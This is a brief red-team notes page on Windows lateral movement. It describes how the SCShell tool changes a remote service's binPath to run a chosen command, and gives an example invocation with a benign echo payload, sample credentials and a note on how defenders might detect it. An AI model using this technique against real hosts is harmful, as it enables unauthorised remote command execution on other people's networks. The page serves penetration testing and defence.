Lateral Movement via Service Configuration Manager
It's possible to execute commands on a remote host by abusing service configuration manager by changing the service binpath to your malicious command and restarting the service so your payload gets executed - this is all automated by a nice tool SCShell

Execution

Scshell expects the following arguments: target, service, payload, username, domain, password:
1
.\scshell.exe ws01 XblAuthManager "C:\windows\system32\cmd.exe /c echo 'lateral hello' > c:\temp\lat.txt" spotless offense 123456
Copied!

Considerations

From the defensive side, you may want to consider about monitoring services that change their binPaths "too often" as this may not be normal in your environment, especially if the binPath is "very" different (Levenshtein) to the previously known good value and if the service configuration is being changed over the network:

References

GitHub - Mr-Un1k0d3r/SCShell: Fileless lateral movement tool that relies on ChangeServiceConfigA to run command
GitHub
Last modified 1yr ago